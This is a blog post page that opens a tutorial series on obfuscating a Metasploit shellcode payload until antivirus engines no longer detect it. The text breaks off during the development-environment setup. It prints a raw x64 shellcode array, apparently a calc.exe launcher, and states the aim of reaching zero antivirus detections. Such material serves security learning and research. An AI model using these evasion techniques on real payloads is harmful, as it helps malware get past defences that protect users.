<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
    <script defer language="javascript" type="text/javascript" src="https://whokilleddb.github.io/blogs/js/light_dark.js"></script>
<script defer language="javascript" type="text/javascript" src="https://whokilleddb.github.io/blogs/js/tabs.js"></script>


<script defer language="javascript" type="text/javascript" src="https://whokilleddb.github.io/blogs/js/katex.min.js"></script>


<script defer language="javascript" type="text/javascript" src="https://whokilleddb.github.io/blogs/js/auto-render.min.js"></script>


<script defer language="javascript" type="text/javascript" src="https://whokilleddb.github.io/blogs/js/katex.js"></script>
<script defer language="javascript" type="text/javascript" src="https://whokilleddb.github.io/blogs/js/toc.js"></script>


    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta name="generator" content="Hugo 0.109.0">

    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>A Study In Obfuscation &middot; </title>
    <meta name="description" content="" />

    
    <link type="text/css" rel="stylesheet" href="https://whokilleddb.github.io/blogs/css/poole.css">
<link type="text/css" rel="stylesheet" href="https://whokilleddb.github.io/blogs/css/syntax.css">
<link type="text/css" rel="stylesheet" href="https://whokilleddb.github.io/blogs/css/hyde.css">
<link type="text/css" rel="stylesheet" href="https://whokilleddb.github.io/blogs/css/poison.css">
<link type="text/css" rel="stylesheet" href="https://whokilleddb.github.io/blogs/css/fonts.css">
<link type="text/css" rel="stylesheet" href="https://whokilleddb.github.io/blogs/css/katex.min.css">
<link type="text/css" rel="stylesheet" href="https://whokilleddb.github.io/blogs/css/tabs.css">


    
    
    <style>
    body {
        --sidebar-bg-color: #202020;
        --sidebar-img-border-color: #515151;
        --sidebar-p-color: #909090;
        --sidebar-h1-color: #FFF;
        --sidebar-a-color: #FFF;
        --sidebar-socials-color: #FFF;
        --text-color: #222;
        --bkg-color: #FAF9F6;
        --post-title-color: #303030;
        --list-color: #5a5a5a;
        --link-color: #268bd2;
        --date-color: #515151;
        --code-color: #bf616a;
        --code-background-color: #f9f9f9;
        --moon-sun-color: #FFF;
        --moon-sun-background-color: #515151;
    }
    body.dark-theme {
        --text-color: #eee;
        --bkg-color: #121212;
        --post-title-color: #DBE2E9;
        --list-color: #9d9d9d;
        --link-color: #268bd2;
        --date-color: #9a9a9a;
        --code-color: #ff7f7f;
        --code-background-color: #393D47;
    }
    body {
        background-color: var(--bkg-color);
    }
</style>

</head>

    <body class="dark-theme">
        <aside class="sidebar">
    <div class="container sidebar-sticky">
        <div class="light-dark" align="right">
    <button class="btn-light-dark">
        <svg class="moon" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M6 .278a.768.768 0 0 1 .08.858a7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277c.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316a.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71C0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"/>
        </svg>
        <svg class="sun" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M8 12a4 4 0 1 0 0-8a4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"/>
        </svg>
    </button>
</div>

        <div class="sidebar-about">
    <h1 class="brand">
        
            <a href="https://whokilleddb.github.io/blogs/">
                <img src="/blogs/images/avatar.png" alt="brand image">
            </a>
        
        
            <a href="https://whokilleddb.github.io/blogs/">
                <h1>db&#39;s bl0gs</h1>
            </a>
        
    </h1>
    <p class="lead">
    I am Batman
    </p>
</div>

        <nav>
    <ul class="sidebar-nav">
        
        
        
        
            
                
                    <li class="heading">
                        <a href="/posts/">Posts</a>
                    </li>
                    
                        <li class="sub-heading">
                            Recent
                        </li>
                        
                            <li class="bullet">
                                <a href="https://whokilleddb.github.io/blogs/posts/dotnet-clr-etw/">A gentle guide to the land of .NET, CLR and ETW</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="https://whokilleddb.github.io/blogs/posts/thm_gallery/">TryHackMe: Gallery</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="https://whokilleddb.github.io/blogs/posts/thm_dig_dug/">TryHackMe: Dig Dug</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="https://whokilleddb.github.io/blogs/posts/thm_agentt/">TryHackMe: Agentt</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="https://whokilleddb.github.io/blogs/posts/a_study_in_obfuscation/">A Study In Obfuscation</a>
                            </li>
                        
                    
                
            
        

    </ul>
</nav>

        
    <a target="_blank" class="social" href="https://github.com/whokilleddb">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="-2 -2 24 24">
            <path fill="currentColor" d="M18.88 1.099C18.147.366 17.265 0 16.233 0H3.746C2.714 0 1.832.366 1.099 1.099C.366 1.832 0 2.714 0 3.746v12.487c0 1.032.366 1.914 1.099 2.647c.733.733 1.615 1.099 2.647 1.099H6.66c.19 0 .333-.007.429-.02a.504.504 0 0 0 .286-.169c.095-.1.143-.245.143-.435l-.007-.885c-.004-.564-.006-1.01-.006-1.34l-.3.052c-.19.035-.43.05-.721.046a5.555 5.555 0 0 1-.904-.091a2.026 2.026 0 0 1-.872-.39a1.651 1.651 0 0 1-.572-.8l-.13-.3a3.25 3.25 0 0 0-.41-.663c-.186-.243-.375-.407-.566-.494l-.09-.065a.956.956 0 0 1-.17-.156a.723.723 0 0 1-.117-.182c-.026-.061-.004-.111.065-.15c.07-.04.195-.059.378-.059l.26.04c.173.034.388.138.643.311a2.1 2.1 0 0 1 .631.677c.2.355.44.626.722.813c.282.186.566.28.852.28c.286 0 .533-.022.742-.065a2.59 2.59 0 0 0 .585-.196c.078-.58.29-1.028.637-1.34a8.907 8.907 0 0 1-1.333-.234a5.314 5.314 0 0 1-1.223-.507a3.5 3.5 0 0 1-1.047-.872c-.277-.347-.505-.802-.683-1.365c-.177-.564-.266-1.215-.266-1.952c0-1.049.342-1.942 1.027-2.68c-.32-.788-.29-1.673.091-2.652c.252-.079.625-.02 1.119.175c.494.195.856.362 1.086.5c.23.14.414.257.553.352a9.233 9.233 0 0 1 2.497-.338c.859 0 1.691.113 2.498.338l.494-.312a6.997 6.997 0 0 1 1.197-.572c.46-.174.81-.221 1.054-.143c.39.98.424 1.864.103 2.653c.685.737 1.028 1.63 1.028 2.68c0 .737-.089 1.39-.267 1.957c-.177.568-.407 1.023-.689 1.366a3.65 3.65 0 0 1-1.053.865c-.42.234-.828.403-1.223.507a8.9 8.9 0 0 1-1.333.235c.45.39.676 1.005.676 1.846v3.11c0 .147.021.266.065.357a.36.36 0 0 0 .208.189c.096.034.18.056.254.064c.074.01.18.013.318.013h2.914c1.032 0 1.914-.366 2.647-1.099c.732-.732 1.099-1.615 1.099-2.647V3.746c0-1.032-.367-1.914-1.1-2.647z"/>
        </svg>
    </a>


    <a target="_blank" class="social" href="https://linkedin.com/whokilleddb">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 448 512">
            <path fill="currentColor" d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5c0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7c-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5c67.2 0 79.7 44.3 79.7 101.9V416z"/>
        </svg>
    </a>


    <a target="_blank" class="social" href="https://twitter.com/whokilleddb">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M5.032 14.286c6.037 0 9.34-4.837 9.34-9.032c0-.137 0-.274-.01-.41A6.56 6.56 0 0 0 16 3.2c-.6.256-1.235.425-1.885.5a3.207 3.207 0 0 0 1.443-1.757c-.645.37-1.35.63-2.085.77a3.322 3.322 0 0 0-1.862-.958a3.384 3.384 0 0 0-2.082.334a3.223 3.223 0 0 0-1.442 1.49a3.08 3.08 0 0 0-.208 2.03a9.57 9.57 0 0 1-3.747-.963a9.269 9.269 0 0 1-3.018-2.354a3.086 3.086 0 0 0-.36 2.314c.189.787.68 1.475 1.376 1.924a3.344 3.344 0 0 1-1.49-.398v.04c0 .734.263 1.444.743 2.01a3.3 3.3 0 0 0 1.89 1.102c-.483.128-.99.146-1.482.055a3.19 3.19 0 0 0 1.168 1.577a3.36 3.36 0 0 0 1.9.627A6.732 6.732 0 0 1 0 12.86a9.527 9.527 0 0 0 5.032 1.423"/>
        </svg>
    </a>



    <a target="_blank" class="social" href="https://tryhackme.com/">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="0 0 24 24" >
            <path fill="white" d="M10.705 0C7.54 0 4.902 2.285 4.349 5.291a4.525 4.525 0 0 0-4.107 4.5 4.525 4.525 0 0 0 4.52 4.52h6.761a.625.625 0 1 0 0-1.25H4.761a3.273 3.273 0 0 1-3.27-3.27A3.273 3.273 0 0 1 6.59 7.08a.625.625 0 0 0 .7-1.035 4.488 4.488 0 0 0-1.68-.69 5.223 5.223 0 0 1 5.096-4.104 5.221 5.221 0 0 1 5.174 4.57 4.489 4.489 0 0 0-.488.305.625.625 0 1 0 .731 1.013 3.245 3.245 0 0 1 1.912-.616 3.278 3.278 0 0 1 3.203 2.61.625.625 0 0 0 1.225-.251 4.533 4.533 0 0 0-4.428-3.61 4.54 4.54 0 0 0-.958.105C16.556 2.328 13.9 0 10.705 0zm5.192 10.64a.925.925 0 0 0-.462.108.913.913 0 0 0-.313.29 1.27 1.27 0 0 0-.175.427 2.39 2.39 0 0 0-.054.514c0 .181.018.353.054.517.036.164.095.307.175.43a.899.899 0 0 0 .313.297c.127.073.281.11.462.11.18 0 .334-.037.46-.11a.897.897 0 0 0 .309-.296c.08-.124.137-.267.173-.431.036-.164.054-.336.054-.517 0-.18-.018-.352-.054-.514a1.271 1.271 0 0 0-.173-.426.901.901 0 0 0-.309-.291.917.917 0 0 0-.46-.108zm6.486 0a.925.925 0 0 0-.462.108.913.913 0 0 0-.313.29 1.27 1.27 0 0 0-.175.427 2.39 2.39 0 0 0-.053.514c0 .181.017.353.053.517.036.164.095.307.175.43a.899.899 0 0 0 .313.297c.127.073.281.11.462.11.18 0 .334-.037.46-.11a.897.897 0 0 0 .31-.296c.078-.124.136-.267.172-.431.036-.164.054-.336.054-.517 0-.18-.018-.352-.054-.514a1.271 1.271 0 0 0-.173-.426.901.901 0 0 0-.308-.291.916.916 0 0 0-.461-.108zm-8.537.068l-.84.618.313.43.476-.368v1.877h.603v-2.557zm6.486 0l-.841.618.314.43.477-.368v1.877h.603v-2.557zm-4.435.445c.08 0 .143.028.193.084.05.057.087.127.114.21.026.083.044.173.054.269a2.541 2.541 0 0 1 0 .533c-.01.097-.028.187-.054.27a.584.584 0 0 1-.114.21.243.243 0 0 1-.193.085.248.248 0 0 1-.195-.086.584.584 0 0 1-.118-.209 1.245 1.245 0 0 1-.056-.27 2.645 2.645 0 0 1 0-.533c.01-.096.029-.186.056-.27a.583.583 0 0 1 .118-.209.25.25 0 0 1 .195-.084zm6.486 0c.08 0 .144.028.193.084.05.057.087.127.114.21.027.083.044.173.054.269a2.541 2.541 0 0 1 0 .533c-.01.097-.027.187-.054.27a.584.584 0 0 1-.114.21.243.243 0 0 1-.193.085.249.249 0 0 1-.195-.086.581.581 0 0 1-.117-.209 1.245 1.245 0 0 1-.056-.27 2.642 2.642 0 0 1 0-.533c.01-.096.028-.186.056-.27a.58.58 0 0 1 .117-.209.25.25 0 0 1 .195-.084zm-2.191 3.51a.93.93 0 0 0-.463.109.908.908 0 0 0-.312.291c-.08.122-.139.263-.175.426a2.383 2.383 0 0 0-.054.514c0 .18.018.353.054.516.036.164.094.308.175.432a.91.91 0 0 0 .312.296.92.92 0 0 0 .463.11c.18 0 .333-.037.46-.11a.892.892 0 0 0 .308-.296 1.32 1.32 0 0 0 .174-.432c.036-.163.054-.335.054-.516 0-.18-.018-.352-.054-.514a1.274 1.274 0 0 0-.174-.426.89.89 0 0 0-.309-.291.918.918 0 0 0-.46-.108zm-6.402.07l-.841.617.314.43.476-.369v1.878h.604v-2.557zm2.125 0l-.841.617.314.43.477-.369v1.878h.603v-2.557zm2.116 0l-.84.617.313.43.477-.369v1.878h.603v-2.557zm2.16.443c.08 0 .144.028.194.085a.605.605 0 0 1 .114.21c.026.083.044.172.053.269a2.639 2.639 0 0 1 0 .532 1.28 1.28 0 0 1-.053.27.585.585 0 0 1-.114.21.244.244 0 0 1-.193.085.25.25 0 0 1-.196-.085.589.589 0 0 1-.117-.21 1.245 1.245 0 0 1-.056-.27 2.597 2.597 0 0 1 0-.532c.01-.097.028-.186.056-.27a.589.589 0 0 1 .117-.209.249.249 0 0 1 .196-.085zm-6.729 3.073a.676.676 0 0 0-.335.078.661.661 0 0 0-.227.211.91.91 0 0 0-.127.31c-.027.118-.04.242-.04.373s.013.256.04.375a.93.93 0 0 0 .127.313.65.65 0 0 0 .227.215c.092.053.204.08.335.08a.655.655 0 0 0 .334-.08.65.65 0 0 0 .225-.215c.057-.09.1-.194.125-.313a1.75 1.75 0 0 0 .04-.375c0-.13-.014-.255-.04-.373a.931.931 0 0 0-.125-.31.658.658 0 0 0-.225-.21.667.667 0 0 0-.334-.08zm3.086 0a.675.675 0 0 0-.336.078.661.661 0 0 0-.226.211.907.907 0 0 0-.127.31 1.69 1.69 0 0 0-.04.373c0 .131.013.256.04.375a.928.928 0 0 0 .127.313c.058.09.134.162.226.215.093.053.205.08.336.08a.655.655 0 0 0 .334-.08.65.65 0 0 0 .224-.215c.058-.09.1-.194.126-.313a1.752 1.752 0 0 0 0-.748.94.94 0 0 0-.126-.31.657.657 0 0 0-.224-.21.667.667 0 0 0-.334-.08zm5.108 0a.675.675 0 0 0-.336.078.661.661 0 0 0-.226.211.91.91 0 0 0-.127.31c-.027.118-.04.242-.04.373s.013.256.04.375a.931.931 0 0 0 .127.313c.058.09.134.162.226.215.093.053.205.08.336.08.13 0 .243-.027.334-.08a.65.65 0 0 0 .224-.215c.058-.09.1-.194.126-.313a1.75 1.75 0 0 0 .04-.375c0-.13-.014-.255-.04-.373a.943.943 0 0 0-.126-.31.657.657 0 0 0-.224-.21.668.668 0 0 0-.334-.08zm-6.658.05l-.61.448.227.311.346-.266v1.362h.438v-1.856zm3.068 0l-.61.448.227.311.346-.266v1.362h.438v-1.856zm5.108 0l-.611.448.228.311.346-.266v1.362h.438v-1.856zm-9.712.322c.058 0 .105.02.14.062a.421.421 0 0 1 .083.151.96.96 0 0 1 .04.196 1.932 1.932 0 0 1 0 .386.954.954 0 0 1-.04.197.421.421 0 0 1-.083.152.176.176 0 0 1-.14.061.18.18 0 0 1-.141-.06.427.427 0 0 1-.085-.153.887.887 0 0 1-.041-.197 1.96 1.96 0 0 1 0-.386.893.893 0 0 1 .04-.196.42.42 0 0 1 .086-.151.181.181 0 0 1 .141-.062zm3.086 0c.058 0 .104.02.14.062a.421.421 0 0 1 .082.151.94.94 0 0 1 .04.196 1.906 1.906 0 0 1 0 .386.93.93 0 0 1-.04.197.421.421 0 0 1-.082.152.176.176 0 0 1-.14.061.18.18 0 0 1-.141-.06.42.42 0 0 1-.086-.153.846.846 0 0 1-.04-.197 1.965 1.965 0 0 1-.011-.195c0-.057.004-.121.01-.191a.849.849 0 0 1 .041-.196.42.42 0 0 1 .086-.151.182.182 0 0 1 .141-.062zm5.108 0c.058 0 .104.02.14.062a.421.421 0 0 1 .082.151.92.92 0 0 1 .04.196 1.963 1.963 0 0 1 0 .386.943.943 0 0 1-.04.197.421.421 0 0 1-.082.152.177.177 0 0 1-.14.061.18.18 0 0 1-.142-.06.437.437 0 0 1-.085-.153.95.95 0 0 1-.04-.197 1.965 1.965 0 0 1-.011-.195c0-.057.004-.121.01-.191a.959.959 0 0 1 .04-.196.47.47 0 0 1 .086-.151.181.181 0 0 1 .142-.062zm-1.684 1.814a.675.675 0 0 0-.336.079.66.66 0 0 0-.227.21.91.91 0 0 0-.127.31 1.731 1.731 0 0 0 0 .748.939.939 0 0 0 .127.314c.059.09.134.162.227.215.093.053.205.08.336.08a.66.66 0 0 0 .334-.08.648.648 0 0 0 .224-.215c.058-.09.1-.195.126-.314a1.737 1.737 0 0 0-.001-.747.928.928 0 0 0-.125-.31.65.65 0 0 0-.224-.211.668.668 0 0 0-.334-.079zm3.063 0a.676.676 0 0 0-.336.079.664.664 0 0 0-.227.21.906.906 0 0 0-.127.31 1.74 1.74 0 0 0 0 .748.936.936 0 0 0 .127.314.66.66 0 0 0 .227.215c.092.053.204.08.336.08a.654.654 0 0 0 .334-.08.648.648 0 0 0 .223-.215c.058-.09.1-.195.126-.314a1.74 1.74 0 0 0 0-.747.928.928 0 0 0-.126-.31.65.65 0 0 0-.223-.211.666.666 0 0 0-.334-.079zm-1.545.05l-.611.448.228.312.346-.267v1.363h.438v-1.856zm-1.518.323c.057 0 .104.02.14.061a.42.42 0 0 1 .082.152.91.91 0 0 1 .04.195 1.966 1.966 0 0 1 0 .387.951.951 0 0 1-.04.197.421.421 0 0 1-.082.152.177.177 0 0 1-.14.06.18.18 0 0 1-.142-.06.428.428 0 0 1-.085-.152.914.914 0 0 1-.04-.197 1.96 1.96 0 0 1-.011-.195c0-.058.003-.122.01-.192a.923.923 0 0 1 .041-.195c.02-.06.048-.11.085-.152a.181.181 0 0 1 .142-.061zm3.063 0c.057 0 .104.02.14.061a.42.42 0 0 1 .082.152.94.94 0 0 1 .04.195 1.91 1.91 0 0 1 0 .387.93.93 0 0 1-.04.197.422.422 0 0 1-.083.152.175.175 0 0 1-.14.06.18.18 0 0 1-.141-.06.423.423 0 0 1-.085-.152.907.907 0 0 1-.04-.197 1.95 1.95 0 0 1 0-.387.915.915 0 0 1 .04-.195c.02-.06.048-.11.085-.152a.182.182 0 0 1 .142-.061zm-9.713.185a.465.465 0 0 0-.232.055.456.456 0 0 0-.157.146.627.627 0 0 0-.089.215 1.168 1.168 0 0 0-.027.259c0 .09.009.177.027.26a.648.648 0 0 0 .089.216c.04.063.093.112.157.149a.459.459 0 0 0 .232.056c.09 0 .168-.02.231-.056a.45.45 0 0 0 .156-.149.67.67 0 0 0 .087-.217 1.218 1.218 0 0 0 0-.518.647.647 0 0 0-.087-.215.448.448 0 0 0-.156-.146.458.458 0 0 0-.23-.055zm1.052.035l-.423.31.158.217.24-.185v.944h.303v-1.286zm-1.052.224c.04 0 .073.014.097.042a.284.284 0 0 1 .057.105.69.69 0 0 1 .028.136c.004.049.007.092.007.133 0 .04-.003.086-.007.135a.684.684 0 0 1-.028.136.285.285 0 0 1-.057.105.123.123 0 0 1-.097.043.125.125 0 0 1-.098-.043.298.298 0 0 1-.059-.105.612.612 0 0 1-.028-.136 1.39 1.39 0 0 1 0-.268.62.62 0 0 1 .028-.136.297.297 0 0 1 .06-.105.125.125 0 0 1 .097-.042zm3.775 1.394a.463.463 0 0 0-.232.054.452.452 0 0 0-.157.146.621.621 0 0 0-.088.214 1.19 1.19 0 0 0 0 .519.641.641 0 0 0 .088.217.46.46 0 0 0 .157.15.458.458 0 0 0 .232.054.454.454 0 0 0 .232-.055.45.45 0 0 0 .155-.149.664.664 0 0 0 .087-.217 1.189 1.189 0 0 0 0-.519.642.642 0 0 0-.087-.214.446.446 0 0 0-.155-.146.459.459 0 0 0-.232-.054zm1.052.034l-.423.31.158.216.24-.185v.945h.303V22.68zm-1.052.223c.04 0 .073.014.098.043a.3.3 0 0 1 .057.105.643.643 0 0 1 .027.135 1.31 1.31 0 0 1 0 .268.654.654 0 0 1-.027.137.307.307 0 0 1-.057.105.124.124 0 0 1-.098.042.125.125 0 0 1-.098-.042.293.293 0 0 1-.059-.105.618.618 0 0 1-.028-.137 1.364 1.364 0 0 1 0-.268.612.612 0 0 1 .028-.135.287.287 0 0 1 .06-.105.123.123 0 0 1 .097-.043z"></path>
        </svg>
    </a>




    <a target="_blank" class="social" href="https://instagram.com/whokilleddb">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 448 512">
            <path fill="currentColor" d="M224.1 141c-63.6 0-114.9 51.3-114.9 114.9s51.3 114.9 114.9 114.9S339 319.5 339 255.9S287.7 141 224.1 141zm0 189.6c-41.1 0-74.7-33.5-74.7-74.7s33.5-74.7 74.7-74.7s74.7 33.5 74.7 74.7s-33.6 74.7-74.7 74.7zm146.4-194.3c0 14.9-12 26.8-26.8 26.8c-14.9 0-26.8-12-26.8-26.8s12-26.8 26.8-26.8s26.8 12 26.8 26.8zm76.1 27.2c-1.7-35.9-9.9-67.7-36.2-93.9c-26.2-26.2-58-34.4-93.9-36.2c-37-2.1-147.9-2.1-184.9 0c-35.8 1.7-67.6 9.9-93.9 36.1s-34.4 58-36.2 93.9c-2.1 37-2.1 147.9 0 184.9c1.7 35.9 9.9 67.7 36.2 93.9s58 34.4 93.9 36.2c37 2.1 147.9 2.1 184.9 0c35.9-1.7 67.7-9.9 93.9-36.2c26.2-26.2 34.4-58 36.2-93.9c2.1-37 2.1-147.8 0-184.8zM398.8 388c-7.8 19.6-22.9 34.7-42.6 42.6c-29.5 11.7-99.5 9-132.1 9s-102.7 2.6-132.1-9c-19.6-7.8-34.7-22.9-42.6-42.6c-11.7-29.5-9-99.5-9-132.1s-2.6-102.7 9-132.1c7.8-19.6 22.9-34.7 42.6-42.6c29.5-11.7 99.5-9 132.1-9s102.7-2.6 132.1 9c19.6 7.8 34.7 22.9 42.6 42.6c11.7 29.5 9 99.5 9 132.1s2.7 102.7-9 132.1z"/>
        </svg>
    </a>



        <p class="footnote">
powered by <a target="_blank" href="https://gohugo.io">Hugo</a> | themed with <a target="_blank" href="https://github.com/lukeorth/poison">poison</a>
    <br>
    &copy; 2023 . All rights reserved.
</p>

  </div>
</aside>

        <main class="content container">
            <div class="post">
  <div class="info">
    <h1 class="post-title">
        <a href="https://whokilleddb.github.io/blogs/posts/a_study_in_obfuscation/">A Study In Obfuscation</a>
    </h1>
    <time datetime="2022-08-20T15:18:00&#43;0530" class="post-date">
        August 20, 2022
    </time>
    
    
    
    
    
    
</div>

  <h1 id="introduction">Introduction</h1>
<p>In this blog series, we explore how to obfuscate a Metasploit payload to avoid detection by Antivirus Engines and shall try to go invisible. We would start from the ground up: Using a completely unobfuscated shellcode, and try to build upon it till we reach zero detections. All the associated  code for this blog can be found <a href="https://github.com/whokilleddb/A-Study-in-Obfuscation/">in this Github repository</a>.</p>
<p>We would employ known techniques and see how they affect detection rates uploading the compiled executable to <a href="https://antiscan.me/">AntiScan</a> as it does not submit the samples to the vendors.</p>
<p><img src="https://c.tenor.com/ZmZ7UKIc0soAAAAC/anonymous-anonymous-bites-back.gif" alt="Pepe"></p>
<h2 id="environment-setup">Environment Setup</h2>
<p>To begin with, we would be needing some tools and setup to get started. The first thing is the unobfuscated shellcode we&rsquo;ll be using:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>RAW_PAYLOAD <span style="color:#f92672">=</span> <span style="color:#f92672">[</span>
</span></span><span style="display:flex;"><span>    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
</span></span><span style="display:flex;"><span>    0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
</span></span><span style="display:flex;"><span>    0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 
</span></span><span style="display:flex;"><span>    0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 
</span></span><span style="display:flex;"><span>    0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 
</span></span><span style="display:flex;"><span>    0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 
</span></span><span style="display:flex;"><span>    0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 
</span></span><span style="display:flex;"><span>    0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 
</span></span><span style="display:flex;"><span>    0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 
</span></span><span style="display:flex;"><span>    0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 
</span></span><span style="display:flex;"><span>    0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 
</span></span><span style="display:flex;"><span>    0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 
</span></span><span style="display:flex;"><span>    0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 
</span></span><span style="display:flex;"><span>    0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 
</span></span><span style="display:flex;"><span>    0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 
</span></span><span style="display:flex;"><span>    0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 
</span></span><span style="display:flex;"><span>    0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 
</span></span><span style="display:flex;"><span>    0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 
</span></span><span style="display:flex;"><span>    0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 
</span></span><span style="display:flex;"><span>    0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 
</span></span><span style="display:flex;"><span>    0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 
</span></span><span style="display:flex;"><span>    0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 
</span></span><span style="display:flex;"><span>    0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
</span></span><span style="display:flex;"><span><span style="color:#f92672">]</span>
</span></span></code></pre></div><p>This will be our base from where we start. The raw, untampered shellcode is placed in <code>scripts/obfuscator.py</code>. The python file describes a class <code>Obfuscator</code> which takes our shell code and obfuscates it to various levels which is used as the payload in <code>implant.cpp</code></p>
<p>Next up, we need to set up our development environment. For this, we need to install <a href="https://visualstudio.microsoft.com/vs/features/cplusplus/">Visual Studio&rsquo;s C/C++ Development Tools</a>.</p>
<p>Once that is done, we can bring up any IDE of our choice and jump straight to coding. However, if you are using Visual Studio Code, I highly recommend having <code>x64 Native Tools Command Prompt</code> as your default. One way of doing is to add the full path to <code>VsDevCmd.bat</code> to  VS Code&rsquo;s <code>settings.json</code> file as such:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>	<span style="color:#f92672">&#34;workbench.colorTheme&#34;</span>: <span style="color:#e6db74">&#34;Default Dark+&#34;</span>,
</span></span><span style="display:flex;"><span>	<span style="color:#f92672">&#34;terminal.integrated.shell.windows&#34;</span>: <span style="color:#e6db74">&#34;cmd.exe&#34;</span>,
